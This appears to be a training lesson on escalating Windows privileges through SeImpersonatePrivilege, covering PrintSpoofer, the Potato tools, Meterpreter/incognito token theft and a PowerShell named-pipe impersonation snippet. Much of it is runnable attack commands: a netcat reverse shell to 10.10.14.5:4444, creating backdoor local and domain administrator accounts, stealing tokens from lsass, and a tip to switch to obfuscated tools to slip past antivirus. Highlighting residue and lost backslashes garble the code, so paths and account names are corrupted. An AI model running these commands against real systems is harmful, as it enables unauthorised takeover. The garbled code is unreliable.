SeImpersonatePrivilege Exploitation

advanced35 minWriteup

Various techniques to exploit SeImpersonatePrivilege

Learning Objectives

  • Check for SeImpersonate
  • Choose appropriate exploit
  • Execute token impersonation
  • Get SYSTEM shell

SeImpersonatePrivilege is arguably the most important privilege for Windows privilege escalation. When enabled, it allows a process to impersonate the security context of another user. Combined with

, this nearly always leads to SYSTEM access.

This lesson focuses on the various ways to exploit SeImpersonatePrivilege beyond just the Potato family, including token manipulation, named pipe impersonation, and other techniques.

One Privilege = SYSTEM

If you see SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled in your whoami /priv output, you are almost certainly able to escalate to SYSTEM. The only question is which technique to use.

Checking for SeImpersonate

batch
1REM Check current privileges
2whoami /priv
3 
4REM Look for:
5REM SeImpersonatePrivilege          Impersonate a client after authentication
6REM SeAssignPrimaryTokenPrivilege   Replace a process level token
7 
8REM Either of these = likely SYSTEM access!
9 
10REM Common accounts with SeImpersonate:
11REM - IIS Application Pool accounts
12REM - SQL Server service accounts
13REM - LocalService
14REM - NetworkService
15REM - Service accounts in general
16 
17REM Check current user
18whoami
19REM Examples:
20REM iis apppooldefaultapppool
21REM nt authority
22etwork service
23REM nt servicemssqlserver

Web Shells and DB Access

If you have command execution through a web shell (IIS) or SQL injection (xp_cmdshell), you very likely have SeImpersonatePrivilege. This is the most common scenario for this privilege.

Exploitation Techniques

1SeImpersonate Exploitation Methods:
2 
3Potato Attacks (most common):
4├── PrintSpoofer    - Win 10/2016/2019, requires Print Spooler
5├── JuicyPotato     - Win 7-10 (pre-1809), Server 2008-2016
6├── RoguePotato     - Win 10 1809+, Server 2019
7├── SweetPotato     - Multiple techniques combined
8├── GodPotato       - Newest, most compatible
9└── See Potato Attacks lesson for details
10 
11Named Pipe Impersonation:
12├── Create fake named pipe
13├── Wait for SYSTEM process to connect
14├── Impersonate the connecting client
15└── Get SYSTEM token
16 
17RogueWinRM:
18├── Abuse WinRM (if enabled)
19├── Works like Potato but via WinRM
20└── Useful when other methods fail
21 
22Token Manipulation (with Meterpreter):
23├── incognito extension
24├── steal_token
25├── getsystem
26└── Automated token attacks

PrintSpoofer Deep Dive

batch
1REM PrintSpoofer - most reliable for modern Windows
2 
3REM How it works:
4REM 1. Creates a named pipe with controlled name
5REM 2. Uses SpoolSS (Print Spooler) bug to get SYSTEM to connect
6REM 3. Impersonates the SYSTEM connection
7REM 4. Runs our command as SYSTEM
8 
9REM Requirements check:
10whoami /priv | findstr SeImpersonate
11REM Must be Enabled
12 
13sc query spooler | findstr STATE
14REM Must be RUNNING
15 
16REM Usage variants:
17 
18REM Interactive shell
19PrintSpoofer64.exe -i -c cmd.exe
20 
21REM Run single command
22PrintSpoofer64.exe -c 606070;">#a5d6ff;">"whoami"
23 
24REM Create new admin user
25PrintSpoofer64.exe -c 606070;">#a5d6ff;">"net user pwned Password123! /add && net localgroup Administrators pwned /add"
26 
27REM Reverse shell
28PrintSpoofer64.exe -c "C:	emp
29c64.exe -e cmd 10.10.14.5 4444"
30 
31REM Run PowerShell
32PrintSpoofer64.exe -c 606070;">#a5d6ff;">"powershell -ep bypass"

Incognito Token Manipulation

1Incognito - Token listing and impersonation
2 
3Originally standalone tool, now integrated into Metasploit/Meterpreter
4 
5With Meterpreter session:
6─────────────────────────────
7meterpreter > use incognito
8meterpreter > list_tokens -u
9 
10Delegation Tokens Available
11=============================
12NT AUTHORITYLOCAL SERVICE
13NT AUTHORITYNETWORK SERVICE
14NT AUTHORITYSYSTEM
15CORPAdministrator
16 
17Impersonation Tokens Available
18=============================
19NT AUTHORITYANONYMOUS LOGON
20 
21meterpreter > impersonate_token 606070;">#a5d6ff;">"NT AUTHORITYSYSTEM"
22[+] Successfully impersonated user NT AUTHORITYSYSTEM
23 
24meterpreter > getuid
25Server username: NT AUTHORITYSYSTEM

Standalone Incognito

batch
1REM Incognito.exe (standalone version)
2 
3REM List available tokens
4incognito.exe list_tokens -u
5 
6REM Execute command as another user
7incognito.exe execute -c 606070;">#a5d6ff;">"NT AUTHORITYSYSTEM" cmd.exe
8 
9REM Add user as another user
10incognito.exe execute -c 606070;">#a5d6ff;">"DOMAINAdministrator" "net user hacker Password123! /add /domain"

Meterpreter Token Commands

1Meterpreter Token Manipulation:
2 
3606070;"># Check current user
4meterpreter > getuid
5 
6606070;"># Try automatic privilege escalation
7meterpreter > getsystem
8606070;"># Tries multiple techniques:
9606070;"># - Named Pipe Impersonation (In Memory/Admin)
10606070;"># - Named Pipe Impersonation (Dropper/Admin)
11606070;"># - Token Duplication (In Memory/Admin)
12606070;"># - Named Pipe Impersonation (RPCSS variant)
13606070;"># - Named Pipe Impersonation (PrintSpooler variant)
14 
15606070;"># If getsystem fails, try manual:
16 
17606070;"># Load incognito extension
18meterpreter > use incognito
19 
20606070;"># List available tokens
21meterpreter > list_tokens -u
22 
23606070;"># Impersonate specific token
24meterpreter > impersonate_token 606070;">#a5d6ff;">"NT AUTHORITY\SYSTEM"
25 
26606070;"># Steal token from specific process
27meterpreter > steal_token <PID>
28 
29606070;"># Find SYSTEM process to steal from:
30meterpreter > ps
31606070;"># Look for: lsass.exe, winlogon.exe, services.exe
32 
33meterpreter > steal_token 512   606070;"># PID of lsass
34 
35606070;"># Revert to original token
36meterpreter > rev2self

Named Pipe Impersonation

powershell
1606070;"># Named Pipe Impersonation concept
2606070;"># Create a pipe → SYSTEM connects → We impersonate
3 
4606070;"># This is what Potato attacks automate
5606070;"># Can also be done manually:
6 
7606070;"># PowerShell named pipe server
8$PipeName = 606070;">#a5d6ff;">"evil_pipe"
9$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,
10    [System.IO.Pipes.PipeDirection]::InOut)
11 
12606070;"># Wait for connection
13$Pipe.WaitForConnection()
14 
15606070;"># Get connected client's identity
16$Identity = New-Object System.Security.Principal.WindowsIdentity($Pipe.GetImpersonationUserName())
17 
18606070;"># Impersonate
19$Context = $Identity.Impersonate()
20 
21606070;"># Now running as connected user!
22606070;"># If SYSTEM connected, we're SYSTEM
23 
24606070;"># Cleanup
25$Context.Undo()
26$Pipe.Close()

Triggering SYSTEM Connection

The hard part is getting SYSTEM to connect to your pipe. This is what Potato attacks solve - they use various tricks (Print Spooler, BITS, COM objects) to trigger SYSTEM connections.

Troubleshooting

1Common Issues and Solutions:
2 
3PrintSpoofer fails:
4├── Print Spooler not running → Try JuicyPotato/RoguePotato
5├── SeImpersonate disabled → Check whoami /priv carefully
6├── AV blocking → Try obfuscated version or alternate tool
7└── Wrong architecture → Use 32/64 bit matching target
8 
9JuicyPotato fails:
10├── Windows 10 1809+ → Use PrintSpoofer/RoguePotato
11├── Wrong CLSID → Find working CLSID for your OS
12├── Port in use → Change -l port number
13└── COM blocked → Try different CLSID
14 
15RoguePotato fails:
16├── No remote listener → Must set up socat redirect
17├── Firewall blocking → Check port 135 access
18└── Wrong setup → Verify socat command
19 
20General tips:
21├── Always verify SeImpersonate is Enabled (not just present)
22├── Check OS version to pick correct tool
23├── Try multiple tools if first fails
24└── Check AV logs for blocks

SeImpersonate Exploitation Flow

SeImpersonate to SYSTEM

1
Confirmwhoami /priv - verify SeImpersonate Enabled
2
Check OSsysteminfo for Windows version
3
Check Spoolersc query spooler for Print Spooler status
4
Choose ToolPrintSpoofer → JuicyPotato → RoguePotato
5
TransferUpload chosen tool to target
6
ExecuteRun with reverse shell or command
7
Verifywhoami should show SYSTEM

Knowledge Check

Quick Quiz
Question 1 of 3

Which accounts commonly have SeImpersonatePrivilege?

Challenges

SeImpersonate Escalation

Challenge
🔥 intermediate

You have a web shell running as IIS AppPool with SeImpersonatePrivilege. Escalate to SYSTEM using any available technique.

Need a hint? (4 available)

Key Takeaways

  • SeImpersonatePrivilege = near-guaranteed SYSTEM access
  • Service accounts (IIS, SQL) almost always have this privilege
  • PrintSpoofer is the first tool to try on modern Windows
  • Multiple Potato variants exist for different Windows versions
  • Meterpreter's getsystem automates many techniques
  • If one tool fails, try another - the privilege is exploitable